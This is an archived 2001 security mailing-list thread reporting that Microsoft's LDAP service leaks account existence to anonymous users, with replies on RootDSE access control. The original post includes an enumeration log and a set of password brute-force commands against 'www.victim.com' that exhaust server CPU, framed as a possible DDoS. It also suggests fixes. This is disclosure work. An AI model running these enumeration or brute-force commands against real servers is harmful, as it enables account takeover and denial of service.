Jeremy, Having just gone round and round with Redmond on this one, it is my understanding that Microsoft does not have any means to set Access Control on the RootDSE even if we wanted to. I believe it's still their position that access to the RootDSE should not be restricted and that the RFC supports this claim. I vehemently disagree however... --Tim "Jeremy Sanders" <jsandersat_private> 07/02/2001 09:12 To: <Eliel.Sardanonsat_private>, <focus-msat_private>, <vuln-devat_private> cc: Subject: Re: implementation problem in Microsoft LDAP? I would think it would depend on the desired permissions of the anonymous user. Some LDAP directories are intended for anonymous use, but this functionality should be configurable within the directory. I know it is in eDirectory's LDAP implementation. The ideal configuration should allow you to completely disallow anonymous binding if that is the desired configuration. >>> Sardaņons, Eliel <Eliel.Sardanonsat_private> 06/29/01 09:40AM >>> Hello, I have been looking at the microsoft LDAP service error codes responses and when I'm not authenticated (anonymous) I can know if an object exists or not. I would like to know if this is an implementation problem. Problem 1: Here we have a log of the saucer program (an ldap client) as you can see, I'm connected to 192.168.0.1:389 (ldap) anonymously, when I make a search for a user (or another object) that exist it returns to me a 'LDAP_SUCCES' but no data in the response (because i'm not logged in). But when I make a search trying to find a user or another object that doesn't exist it returns a 'No such object'. This can be used by an attacker to gather information from the windows box, for example if somebody want's to know if an account named 'test' exists, he can search for that user object and if it returns an ldap_succes the user exist, so he can start trying to brute force that account. -------- Saucer LOG -------- /usr/local/ldap/openldap-2.0.4/contrib/saucer# ./saucer -h 192.168.0.1 Bound anonymously to ldap server saucer dn=> show CN=Administrator,CN=Users,DC=dev,DC=local Results... saucer dn=> show CN=Administrators,CN=Users,DC=dev,DC=local Results... Error... ./saucer: No such object matched DN: "CN=Users,DC=dev,DC=local" additional info: 0000208D: NameErr: DSID-031001C9, problem 2001 (NO_OBJECT), data 0, best match of: 'CN=Users,DC=dev,DC=local' saucer dn=> ----- EOF -------- Problem 2: Another problem I have seen is that when I use my brute force program (brute_force_ldap) to try to guess a Windows password and I run 5 or more instance of my program at the same time like this: ./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_1 -l 8 & ./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_2 -l 8 & ./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_3 -l 8 & ./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_4 -l 8 & ./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_5 -l 8 & ./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_6 -l 8 & the CPU usage in www.victim.com is at 100%!!! And the console is unusable in the windows box. I try this using a none_existent_user and an existent_user and it consumes more resources with non existent users. So an attacker can use my program as a Distributed Denial Of service Attack (ddos) running it from different machines at the same time with a unique target. (www.victim.com). SOLUTIONS: Problem 1: Return 'Object Not found' if the user has no priviliges. Problem 2: RST the TCP connection if the user put wrong credentials or introduce a delay in each try. Eliel C. Sardaņons eliel.sardanonsat_private Escuela Tecnica Philips Argentina
This archive was generated by hypermail 2b30 : Mon Jul 02 2001 - 22:25:36 PDT